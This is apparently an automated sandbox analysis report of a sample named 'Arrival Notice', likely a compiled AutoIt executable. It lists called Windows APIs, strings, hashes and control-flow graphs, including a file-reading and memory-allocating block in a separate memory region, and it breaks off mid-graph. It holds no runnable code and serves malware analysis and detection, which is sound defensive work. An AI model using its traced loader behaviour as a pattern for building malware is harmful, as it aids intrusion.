                                              • API String ID: 4003667617-3242690629
                                              • Opcode ID: 7e05f53c489e2d4c7f631a03e99dcb97be4a90f5e6fb184aef47e72d79d028c6
                                              • Instruction ID: 29e733249e600054044a207c1a414cad46a33de9c6803bcb814bbca434b18dab
                                              • Opcode Fuzzy Hash: 7e05f53c489e2d4c7f631a03e99dcb97be4a90f5e6fb184aef47e72d79d028c6
                                              • Instruction Fuzzy Hash: 21B2B170608745DFD724DF28C884BAAB7E5FF85304F154A1EE49AC72A1DB75E884CB82

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 009391E9: __time64.LIBCMT ref: 009391F3
                                                • Part of subcall function 008D5045: _fseek.LIBCMT ref: 008D505D
                                              • __wsplitpath.LIBCMT ref: 009394BE
                                                • Part of subcall function 008F432E: __wsplitpath_helper.LIBCMT ref: 008F436E
                                              • _wcscpy.LIBCMT ref: 009394D1
                                              • _wcscat.LIBCMT ref: 009394E4
                                              • __wsplitpath.LIBCMT ref: 00939509
                                              • _wcscat.LIBCMT ref: 0093951F
                                              • _wcscat.LIBCMT ref: 00939532
                                                • Part of subcall function 0093922F: _memmove.LIBCMT ref: 00939268
                                                • Part of subcall function 0093922F: _memmove.LIBCMT ref: 00939277
                                              • _wcscmp.LIBCMT ref: 00939479
                                                • Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AAE
                                                • Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AC1
                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009396DC
                                              • _wcsncpy.LIBCMT ref: 0093974F
                                              • DeleteFileW.KERNEL32(?,?), ref: 00939785
                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0093979B
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009397AC
                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009397BE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                              • String ID:
                                              • API String ID: 1500180987-0
                                              • Opcode ID: a7f7e82769389d72edf0a743f758312f2d95664d98b486b0b62b12cc7665caf3
                                              • Instruction ID: 058a768ebc6bc619afb8df5ade86c353bda3256a94d06dac64a955c30262844e
                                              • Opcode Fuzzy Hash: a7f7e82769389d72edf0a743f758312f2d95664d98b486b0b62b12cc7665caf3
                                              • Instruction Fuzzy Hash: D1C11AB1D00219AADF21DFA5CC85AEEB7BDEF55310F0040AAF609E6251DB709A848F65

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 008D3074
                                              • RegisterClassExW.USER32(00000030), ref: 008D309E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D30AF
                                              • InitCommonControlsEx.COMCTL32(?), ref: 008D30CC
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008D30DC
                                              • LoadIconW.USER32(000000A9), ref: 008D30F2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008D3101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: 508ac4f71db86272ba8dca15723ca6c39734e9a936b19b7433d1c15805407092
                                              • Instruction ID: e4e35d238ed7d7793bbdd2c0111e3fdb0553e706ee85df8de6d0ddba84996522
                                              • Opcode Fuzzy Hash: 508ac4f71db86272ba8dca15723ca6c39734e9a936b19b7433d1c15805407092
                                              • Instruction Fuzzy Hash: D43167B1869309AFDB00CFA9D888ADDBBF4FB09321F14456AE580E62A0D3B50545DF40

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 008D3074
                                              • RegisterClassExW.USER32(00000030), ref: 008D309E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D30AF
                                              • InitCommonControlsEx.COMCTL32(?), ref: 008D30CC
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008D30DC
                                              • LoadIconW.USER32(000000A9), ref: 008D30F2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008D3101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: f7f94f568e6d296d4fd337928181ca79f69deb6e59801e9cbe7e6b75b39f2046
                                              • Instruction ID: baf5eb6fdea8638da360f0fa2c24518b506972c58e12d7920b1b5cf095d88bee
                                              • Opcode Fuzzy Hash: f7f94f568e6d296d4fd337928181ca79f69deb6e59801e9cbe7e6b75b39f2046
                                              • Instruction Fuzzy Hash: D921C5B1925318AFDB00DFAAE859BDDBBF4FB08721F04412AF910A62A0D7B14544AF91

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 008D4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009962F8,?,008D37C0,?), ref: 008D4882
                                                • Part of subcall function 008F074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008D72C5), ref: 008F0771
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008D7308
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0090ECF1
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0090ED32
                                              • RegCloseKey.ADVAPI32(?), ref: 0090ED70
                                              • _wcscat.LIBCMT ref: 0090EDC9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 2673923337-2727554177
                                              • Opcode ID: bae6e5e695b108416ae99c018e360649e7c92fa02ea3dc38f77162b7e7c57493
                                              • Instruction ID: bc26aac23ecf35724aeb333ef483531cb74305ef8f91e4c5642918f7f87d86bd
                                              • Opcode Fuzzy Hash: bae6e5e695b108416ae99c018e360649e7c92fa02ea3dc38f77162b7e7c57493
                                              • Instruction Fuzzy Hash: DE71397142C3059EC714EFA9D8819AFBBE8FF94750B44492FF455C32A1EB309948DB52

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 008D3A62
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 008D3A71
                                              • LoadIconW.USER32(00000063), ref: 008D3A88
                                              • LoadIconW.USER32(000000A4), ref: 008D3A9A
                                              • LoadIconW.USER32(000000A2), ref: 008D3AAC
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008D3AD2
                                              • RegisterClassExW.USER32(?), ref: 008D3B28
                                                • Part of subcall function 008D3041: GetSysColorBrush.USER32(0000000F), ref: 008D3074
                                                • Part of subcall function 008D3041: RegisterClassExW.USER32(00000030), ref: 008D309E
                                                • Part of subcall function 008D3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D30AF
                                                • Part of subcall function 008D3041: InitCommonControlsEx.COMCTL32(?), ref: 008D30CC
                                                • Part of subcall function 008D3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008D30DC
                                                • Part of subcall function 008D3041: LoadIconW.USER32(000000A9), ref: 008D30F2
                                                • Part of subcall function 008D3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008D3101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 423443420-4155596026
                                              • Opcode ID: 5fddb846da06304ac978c4f54cf8f966eb8cac824c3215870b0e603e1caf5199
                                              • Instruction ID: 49fe1214780a85d9ca720035c74a11f90dd6839301e1624feb81dbc555853a04
                                              • Opcode Fuzzy Hash: 5fddb846da06304ac978c4f54cf8f966eb8cac824c3215870b0e603e1caf5199
                                              • Instruction Fuzzy Hash: 0C214B70929308AFEB109FA9EC09B9D7BB4FB08711F00016BE514E62A0D7BA5654AF85

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 767 8d3633-8d3681 769 8d36e1-8d36e3 767->769 770 8d3683-8d3686 767->770 769->770 773 8d36e5 769->773 771 8d3688-8d368f 770->771 772 8d36e7 770->772 774 8d375d-8d3765 PostQuitMessage 771->774 775 8d3695-8d369a 771->775 777 8d36ed-8d36f0 772->777 778 90d31c-90d34a call 8e11d0 call 8e11f3 772->778 776 8d36ca-8d36d2 DefWindowProcW 773->776 783 8d3711-8d3713 774->783 779 8d36a0-8d36a2 775->779 780 90d38f-90d3a3 call 932a16 775->780 782 8d36d8-8d36de 776->782 784 8d3715-8d373c SetTimer RegisterWindowMessageW 777->784 785 8d36f2-8d36f3 777->785 813 90d34f-90d356 778->813 786 8d36a8-8d36ad 779->786 787 8d3767-8d3776 call 8d4531 779->787 780->783 804 90d3a9 780->804 783->782 784->783 788 8d373e-8d3749 CreatePopupMenu 784->788 791 8d36f9-8d370c KillTimer call 8d44cb call 8d3114 785->791 792 90d2bf-90d2c2 785->792 793 90d374-90d37b 786->793 794 8d36b3-8d36b8 786->794 787->783 788->783 791->783 798 90d2c4-90d2c6 792->798 799 90d2f8-90d317 MoveWindow 792->799 793->776 801 90d381-90d38a call 92817e 793->801 802 8d36be-8d36c4 794->802 803 8d374b-8d375b call 8d45df 794->803 807 90d2e7-90d2f3 SetFocus 798->807 808 90d2c8-90d2cb 798->808 799->783 801->776 802->776 802->813 803->783 804->776 807->783 808->802 814 90d2d1-90d2e2 call 8e11d0 808->814 813->776 817 90d35c-90d36f call 8d44cb call 8d43db 813->817 814->783 817->776
                                              APIs
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 008D36D2
                                              • KillTimer.USER32(?,00000001), ref: 008D36FC
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008D371F
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D372A
                                              • CreatePopupMenu.USER32 ref: 008D373E
                                              • PostQuitMessage.USER32(00000000), ref: 008D375F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                              • String ID: TaskbarCreated
                                              • API String ID: 129472671-2362178303
                                              • Opcode ID: 14f748a20bf134979fc70a377891bb7602e6c940c563fcfb90007392d6a478e7
                                              • Instruction ID: aa9b73438e1f7ef0e7793f1a750888fc81604db408cab3af49360a98abae74ad
                                              • Opcode Fuzzy Hash: 14f748a20bf134979fc70a377891bb7602e6c940c563fcfb90007392d6a478e7
                                              • Instruction Fuzzy Hash: C941D6B2128609ABDF246B6CEC09B793759FB15351F14033BF502D63E1DB609A50B763

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                              • API String ID: 1825951767-3513169116
                                              • Opcode ID: 274612324a05227a37b877f7097a84a6018f91221faae8684b689e3bc0addb05
                                              • Instruction ID: 3b7829bd75ef56b38949dc4d11d1e1eccf0ddaad1280c3d184659de63c00107f
                                              • Opcode Fuzzy Hash: 274612324a05227a37b877f7097a84a6018f91221faae8684b689e3bc0addb05
                                              • Instruction Fuzzy Hash: 69A13E7181022D9ACB14EBA9CC95AEEB778FF14304F44062BF412F7291EF745A09CB62

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1009 14c0920-14c0972 call 14c0820 CreateFileW 1012 14c097b-14c0988 1009->1012 1013 14c0974-14c0976 1009->1013 1016 14c098a-14c0996 1012->1016 1017 14c099b-14c09b2 VirtualAlloc 1012->1017 1014 14c0ad4-14c0ad8 1013->1014 1016->1014 1018 14c09bb-14c09e1 CreateFileW 1017->1018 1019 14c09b4-14c09b6 1017->1019 1021 14c0a05-14c0a1f ReadFile 1018->1021 1022 14c09e3-14c0a00 1018->1022 1019->1014 1023 14c0a21-14c0a3e 1021->1023 1024 14c0a43-14c0a47 1021->1024 1022->1014 1023->1014 1026 14c0a68-14c0a7f WriteFile 1024->1026 1027 14c0a49-14c0a66 1024->1027 1028 14c0aaa-14c0acf FindCloseChangeNotification VirtualFree 1026->1028 1029 14c0a81-14c0aa8 1026->1029 1027->1014 1028->1014 1029->1014
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 014C0965
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075623042.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14c0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                              • Instruction ID: f14f9de835ecc13fa54ed53bd7e7f9b403717ceeb374af118e86ed26489192e9
                                              • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                              • Instruction Fuzzy Hash: A051FC79A50208FFEF60DFA4CC49FDE7778AF48B00F108659F609EB280DA7596458B60

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1049 8d39e7-8d3a57 CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008D3A15
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008D3A36
                                              • ShowWindow.USER32(00000000,?,?), ref: 008D3A4A
                                              • ShowWindow.USER32(00000000,?,?), ref: 008D3A53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: 6f1880598302b1f66b812f5d1ddf0d23d1fb61c2fc7832c7fed0353d93ad7154
                                              • Instruction ID: aeccae158ba1cbf6db4f402208213c1f38d717e6daf6f521afa81d08784e6d21
                                              • Opcode Fuzzy Hash: 6f1880598302b1f66b812f5d1ddf0d23d1fb61c2fc7832c7fed0353d93ad7154
                                              • Instruction Fuzzy Hash: 02F03A706252907EEA30572B6C18E2B2E7DD7CAF61F00002AB910E21B0C2A51800EAB0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1050 8d410d-8d4123 1051 8d4129-8d413e call 8d7b76 1050->1051 1052 8d4200-8d4204 1050->1052 1055 8d4144-8d4164 call 8d7d2c 1051->1055 1056 90d5dd-90d5ec LoadStringW 1051->1056 1059 90d5f7-90d60f call 8d7c8e call 8d7143 1055->1059 1060 8d416a-8d416e 1055->1060 1056->1059 1068 8d417e-8d41fb call 8f3020 call 8d463e call 8f2ffc Shell_NotifyIconW call 8d5a64 1059->1068 1072 90d615-90d633 call 8d7e0b call 8d7143 call 8d7e0b 1059->1072 1062 8d4205-8d420e call 8d81a7 1060->1062 1063 8d4174-8d4179 call 8d7c8e 1060->1063 1062->1068 1063->1068 1068->1052 1072->1068
                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0090D5EC
                                                • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                              • _memset.LIBCMT ref: 008D418D
                                              • _wcscpy.LIBCMT ref: 008D41E1
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008D41F1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                              • String ID: Line:
                                              • API String ID: 3942752672-1585850449
                                              • Opcode ID: b5321a5859b2bfdfbafdf8a17b0b7242eb72a96deb5ea88f65f0dbeadd2ea2e6
                                              • Instruction ID: 75c497f6d32490c43be2084ba4cc09d18fd0b2959cd8ccdf764025c738ee6faf
                                              • Opcode Fuzzy Hash: b5321a5859b2bfdfbafdf8a17b0b7242eb72a96deb5ea88f65f0dbeadd2ea2e6
                                              • Instruction Fuzzy Hash: 2A316B71018318ABEB21EB68DC46FEA77E8FB44314F10461BB595D22A1EB74A648C793

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1085 8f564d-8f5666 1086 8f5668-8f566d 1085->1086 1087 8f5683 1085->1087 1086->1087 1089 8f566f-8f5671 1086->1089 1088 8f5685-8f568b 1087->1088 1090 8f568c-8f5691 1089->1090 1091 8f5673-8f5678 call 8f8d68 1089->1091 1093 8f569f-8f56a3 1090->1093 1094 8f5693-8f569d 1090->1094 1101 8f567e call 8f8ff6 1091->1101 1097 8f56a5-8f56b0 call 8f3020 1093->1097 1098 8f56b3-8f56b5 1093->1098 1094->1093 1096 8f56c3-8f56d2 1094->1096 1099 8f56d9 1096->1099 1100 8f56d4-8f56d7 1096->1100 1097->1098 1098->1091 1103 8f56b7-8f56c1 1098->1103 1104 8f56de-8f56e3 1099->1104 1100->1104 1101->1087 1103->1091 1103->1096 1107 8f57cc-8f57cf 1104->1107 1108 8f56e9-8f56f0 1104->1108 1107->1088 1109 8f56f2-8f56fa 1108->1109 1110 8f5731-8f5733 1108->1110 1109->1110 1111 8f56fc 1109->1111 1112 8f579d-8f579e call 900df7 1110->1112 1113 8f5735-8f5737 1110->1113 1114 8f57fa 1111->1114 1115 8f5702-8f5704 1111->1115 1124 8f57a3-8f57a7 1112->1124 1117 8f575b-8f5766 1113->1117 1118 8f5739-8f5741 1113->1118 1123 8f57fe-8f5807 1114->1123 1121 8f570b-8f5710 1115->1121 1122 8f5706-8f5708 1115->1122 1119 8f576a-8f576d 1117->1119 1120 8f5768 1117->1120 1125 8f5743-8f574f 1118->1125 1126 8f5751-8f5755 1118->1126 1129 8f576f-8f577b call 8f4916 call 9010ab 1119->1129 1130 8f57d4-8f57d8 1119->1130 1120->1119 1121->1130 1131 8f5716-8f572f call 900f18 1121->1131 1122->1121 1123->1088 1124->1123 1127 8f57a9-8f57ae 1124->1127 1128 8f5757-8f5759 1125->1128 1126->1128 1127->1130 1132 8f57b0-8f57c1 1127->1132 1128->1119 1146 8f5780-8f5785 1129->1146 1133 8f57ea-8f57f5 call 8f8d68 1130->1133 1134 8f57da-8f57e7 call 8f3020 1130->1134 1145 8f5792-8f579b 1131->1145 1137 8f57c4-8f57c6 1132->1137 1133->1101 1134->1133 1137->1107 1137->1108 1145->1137 1147 8f580c-8f5810 1146->1147 1148 8f578b-8f578e 1146->1148 1147->1123 1148->1114 1149 8f5790 1148->1149 1149->1145
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                              • String ID:
                                              • API String ID: 1559183368-0
                                              • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                              • Instruction ID: bdb2862f83c6b5eacb373f09f0aaa778903c3b0d64c1cedab98b821125e2928f
                                              • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                              • Instruction Fuzzy Hash: 09519C30A00B0DDBDB24AEB9888467EB7A5FF50324F648629FB35D62D0DB749E518B50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1150 8d69ca-8d69f1 call 8d4f3d 1153 90e45a-90e46a call 9397e5 1150->1153 1154 8d69f7-8d6a05 call 8d4f3d 1150->1154 1158 90e46f-90e471 1153->1158 1154->1153 1161 8d6a0b-8d6a11 1154->1161 1159 90e490-90e4d8 call 8f0ff6 1158->1159 1160 90e473-90e476 call 8d4faa 1158->1160 1170 90e4da-90e4e4 1159->1170 1171 90e4fd 1159->1171 1165 90e47b-90e48a call 934534 1160->1165 1164 8d6a17-8d6a39 call 8d6bec 1161->1164 1161->1165 1165->1159 1173 90e4f8-90e4f9 1170->1173 1174 90e4ff-90e512 1171->1174 1175 90e4e6-90e4f5 1173->1175 1176 90e4fb 1173->1176 1177 90e518 1174->1177 1178 90e689-90e68c call 8f2f95 1174->1178 1175->1173 1176->1174 1179 90e51f-90e522 call 8d75e0 1177->1179 1182 90e691-90e69a call 8d4faa 1178->1182 1183 90e527-90e549 call 8d5f12 call 93768b 1179->1183 1188 90e69c-90e6ac call 8d7776 call 8d5efb 1182->1188 1194 90e54b-90e558 1183->1194 1195 90e55d-90e567 call 937675 1183->1195 1201 90e6b1-90e6e1 call 92fcb1 call 8f106c call 8f2f95 call 8d4faa 1188->1201 1197 90e650-90e660 call 8d766f 1194->1197 1203 90e581-90e58b call 93765f 1195->1203 1204 90e569-90e57c 1195->1204 1197->1183 1206 90e666-90e683 call 8d74bd 1197->1206 1201->1188 1213 90e58d-90e59a 1203->1213 1214 90e59f-90e5a9 call 8d5f8a 1203->1214 1204->1197 1206->1178 1206->1179 